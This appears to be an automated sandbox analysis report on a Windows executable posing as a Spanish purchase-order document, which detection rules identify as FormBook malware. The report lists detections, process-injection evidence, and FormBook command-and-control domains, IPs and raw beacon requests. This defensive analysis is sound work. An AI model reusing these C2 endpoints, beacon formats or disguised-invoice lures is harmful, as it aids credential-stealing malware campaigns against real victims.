Windows Analysis Report
Solicitud de pedido Documento No 168646080.exe

Machine Learning detection for sample

Source: Yara match	File source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Solicitud de pedido Documento No 168646080.exe

Joe Sandbox ML: detected

Source: Solicitud de pedido Documento No 168646080.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Solicitud de pedido Documento No 168646080.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msiexec.pdb source: Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450474495.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450776254.0000000001590000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000008.00000002.3782071356.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450474495.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450776254.0000000001590000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000008.00000002.3782071356.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: qEnw.pdbSHA256 source: Solicitud de pedido Documento No 168646080.exe
Source:	Binary string: wntdll.pdbUGP source: Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450866073.0000000001630000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3787118539.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3787118539.0000000004E2E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1452347994.0000000004AE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1450689990.0000000004932000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Solicitud de pedido Documento No 168646080.exe, Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450866073.0000000001630000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000008.00000002.3787118539.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3787118539.0000000004E2E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1452347994.0000000004AE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1450689990.0000000004932000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: qEnw.pdb source: Solicitud de pedido Documento No 168646080.exe

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 4x nop then pop esi		6_2_00417312
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop esi		8_2_00BA7312

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49711 -> 18.167.179.176:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49713 -> 3.96.23.237:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49715 -> 104.21.12.188:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49716 -> 15.197.142.173:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49717 -> 15.197.130.221:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49718 -> 172.104.233.69:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 13.228.106.35:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49720 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49721 -> 103.224.212.213:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.213 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.104.233.69 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 18.167.179.176 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.12.188 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.96.23.237 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.130.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.228.106.35 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.rdlva.com/pz08/

Performs DNS queries to domains with low reputation

Source:

DNS query: www.ytytyt016.xyz

Source: global traffic	HTTP traffic detected: GET /pz08/?cx=jtuLWRsQ7h/kdQWA3jOYD6sQTdy8Hpo6TuBbTJkxtbgc8qtuAyjytUGgDBD8ARNIyniRVdyhSg==&CR=_DHhAtX HTTP/1.1Host: www.ytytyt016.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=9YX7L4oFB3/EoPBGuEUMKmowUgzTtecO6ANZQ1SJSnxFJE2hiNf1weaUCMKGubsbt86VGUGPQA==&CR=_DHhAtX HTTP/1.1Host: www.aloyoga-uae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=U4nNGnww1kjxOKScgSk+uScuMskua2ucq9ipsnk6Ch7erOE2tdRqmLDXrgubFDKibExXjkNZ4A==&CR=_DHhAtX HTTP/1.1Host: www.kxn.inkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=32Qm6Ke2HKMNxWuGOo4gUstP0NhHa1GW0Wc3g6Bmqj6dA0nbRKEtQTutVOb61eG0z72pbUCjvw==&CR=_DHhAtX HTTP/1.1Host: www.nordens-media.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=j7VZTyaPLotDIgtvuFm1Wc2ZOg86ksyi3hYWattYqpUq5IzwEATKEtPTRIq3N3amsDpuvgSkbA==&CR=_DHhAtX HTTP/1.1Host: www.thewipglobal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=0FaXmte0/P3knfwA0sMIwS1mD7E8vQQWGPcDD9zpFFyhOAUFaj5MXy9fjN6AdDBGShPY7E+43Q==&CR=_DHhAtX HTTP/1.1Host: www.boostyourselftoday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=iU/VPDM1hXdODhSoU7U2JopiHjlxkOyRWPhUw/eyvzY6Otnmd1rCkE8jNVWF6hpsFcjAQEEsrA==&CR=_DHhAtX HTTP/1.1Host: www.yobo-by.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=sHUCYmOOLAoNE4y8/5cjc5MBwdY8WEAoN/4wEGeHNPnX/dfJjUbL6GitjPJCVlt1GculRFq7FA==&CR=_DHhAtX HTTP/1.1Host: www.rdlva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX HTTP/1.1Host: www.yassa-hany.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 103.224.212.213 103.224.212.213
Source: Joe Sandbox View	IP Address: 15.197.130.221 15.197.130.221

Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 7_2_08687F82 getaddrinfo,setsockopt,recv,

7_2_08687F82

Source: global traffic	HTTP traffic detected: GET /pz08/?cx=jtuLWRsQ7h/kdQWA3jOYD6sQTdy8Hpo6TuBbTJkxtbgc8qtuAyjytUGgDBD8ARNIyniRVdyhSg==&CR=_DHhAtX HTTP/1.1Host: www.ytytyt016.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=9YX7L4oFB3/EoPBGuEUMKmowUgzTtecO6ANZQ1SJSnxFJE2hiNf1weaUCMKGubsbt86VGUGPQA==&CR=_DHhAtX HTTP/1.1Host: www.aloyoga-uae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=U4nNGnww1kjxOKScgSk+uScuMskua2ucq9ipsnk6Ch7erOE2tdRqmLDXrgubFDKibExXjkNZ4A==&CR=_DHhAtX HTTP/1.1Host: www.kxn.inkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=32Qm6Ke2HKMNxWuGOo4gUstP0NhHa1GW0Wc3g6Bmqj6dA0nbRKEtQTutVOb61eG0z72pbUCjvw==&CR=_DHhAtX HTTP/1.1Host: www.nordens-media.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=j7VZTyaPLotDIgtvuFm1Wc2ZOg86ksyi3hYWattYqpUq5IzwEATKEtPTRIq3N3amsDpuvgSkbA==&CR=_DHhAtX HTTP/1.1Host: www.thewipglobal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=0FaXmte0/P3knfwA0sMIwS1mD7E8vQQWGPcDD9zpFFyhOAUFaj5MXy9fjN6AdDBGShPY7E+43Q==&CR=_DHhAtX HTTP/1.1Host: www.boostyourselftoday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=iU/VPDM1hXdODhSoU7U2JopiHjlxkOyRWPhUw/eyvzY6Otnmd1rCkE8jNVWF6hpsFcjAQEEsrA==&CR=_DHhAtX HTTP/1.1Host: www.yobo-by.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=sHUCYmOOLAoNE4y8/5cjc5MBwdY8WEAoN/4wEGeHNPnX/dfJjUbL6GitjPJCVlt1GculRFq7FA==&CR=_DHhAtX HTTP/1.1Host: www.rdlva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX HTTP/1.1Host: www.yassa-hany.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.ytytyt016.xyz

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Feb 2024 13:56:01 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 9Connection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bx9nK6ndDF2UVpxmF3GIUFSCGRSrM7hD0Jqw7lNyNch%2BHrEuUYJwyNl%2BsChtHmoCrEjH0I3TOEKqI9HzaMw3iyz1Ry3Nhj2L%2BjAe85GNWEc08%2BUj3bRZ8xOBnjKjFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 85c92b239cd2393a-IADalt-svc: h3=":443"; ma=86400Data Raw: 4e 6f 74 20 66 6f 75 6e 64 Data Ascii: Not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Wed, 28 Feb 2024 13:56:21 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 28 Feb 2024 13:56:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Wed, 28 Feb 2024 13:57:24 GMTContent-Type: text/htmlContent-Length: 118Connection: closeSet-Cookie: AWSALBTG=NS0vl/nza4XrlBrxo9sozNHchfYtqQ0GHoh3ll7hy+Q6+MjBhfzp1LuA5P+nivzgriz1HGM8gtsF4KX/KJcqXMLDjGBedBekzlEu+rfYz7Bg48nOOWiT/P7gxOUL74MLBzpZBEFagXa6dw2II47xPyomPV2Ke79MTma+7aPJnVy3eJM7jNg=; Expires=Wed, 06 Mar 2024 13:57:24 GMT; Path=/Set-Cookie: AWSALBTGCORS=NS0vl/nza4XrlBrxo9sozNHchfYtqQ0GHoh3ll7hy+Q6+MjBhfzp1LuA5P+nivzgriz1HGM8gtsF4KX/KJcqXMLDjGBedBekzlEu+rfYz7Bg48nOOWiT/P7gxOUL74MLBzpZBEFagXa6dw2II47xPyomPV2Ke79MTma+7aPJnVy3eJM7jNg=; Expires=Wed, 06 Mar 2024 13:57:24 GMT; Path=/; SameSite=NoneData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Source: explorer.exe, 00000007.00000000.1404737205.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076096336.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1400763219.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3794119509.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2271828334.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000007.00000000.1404737205.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076096336.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1400763219.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3794119509.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2271828334.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000007.00000000.1404737205.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076096336.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1400763219.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3794119509.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2271828334.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000007.00000000.1404737205.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076096336.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1400763219.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3794119509.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2271828334.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000007.00000002.3796442982.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3794964784.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3796420580.0000000008810000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000002.1394754443.00000000029DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000007.00000002.3808854347.000000001092F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000008.00000002.3789027018.000000000570F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://ww25.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpB
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.5819995.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.5819995.com/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.5819995.com/pz08/www.tacoshack479.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.5819995.comReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aloyoga-uae.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aloyoga-uae.com/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aloyoga-uae.com/pz08/www.kxn.ink
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aloyoga-uae.comReferer:
Source: explorer.exe, 00000007.00000003.2271963651.0000000007320000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3794295750.0000000007319000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1400763219.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2271937280.0000000007318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2271828334.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.boostyourselftoday.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.boostyourselftoday.com/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.boostyourselftoday.com/pz08/www.yobo-by.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.boostyourselftoday.comReferer:
Source: explorer.exe, 00000007.00000002.3793412922.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.go-bloggers.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.go-bloggers.com/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.go-bloggers.com/pz08/www.tobegoodlife.net
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.go-bloggers.comReferer:
